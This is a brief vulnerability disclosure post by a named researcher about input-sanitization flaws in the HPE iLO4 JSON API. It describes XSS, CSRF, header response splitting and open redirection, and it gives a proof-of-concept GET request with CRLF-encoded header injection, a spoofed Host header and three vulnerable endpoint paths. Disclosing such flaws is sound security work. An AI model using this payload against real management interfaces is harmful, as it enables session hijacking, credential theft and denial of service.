“HURT” – XSS / CSRF / DoS / Open Redirection / HTML Injection & HEADER Response Splitting in HPE iLO4
PLEASE CREDIT: Ken Pyle, Partner of CYBIR & Graduate Professor at Chestnut Hill College IN ALL REFERENCES TO THIS VULNERABILITY.
The HPE iLOv4 / IPMI based application fails to properly sanitize requests which leverage the JSON based API. These input fields allow for a number of high severity attacks.
In this example supplied, the HEALTH_SUMMARY call is abused and arbitrary encoded HTML code is injected. Additionally, the HOST HEADER is arbitrarily modified.
This condition results in a number of exploitable conditions:
CSRF / XSS / Session Riding / Token Theft / Client-Side Code Execution / Theft of Credentials / Denial of Service / Open redirection
PoC (Proof Of Concept) Request:
GET /json/(call)?null&_=%0aFAKE%20HEADER:%20CYBIRPOC.COM%0a%0a HTTP/1.1
Host: cybirpoc.com
Sample PoC / Entry Points:
/json/health_summary?null&_=
/json/login_session?_=
/json/session_info?_=
PoC (Proof Of Concept) Screenshot:
#hpe #ilo #ipmi #bluemonday #rsac2022 #exploit #0day #vulnerability #iot #cybersecurity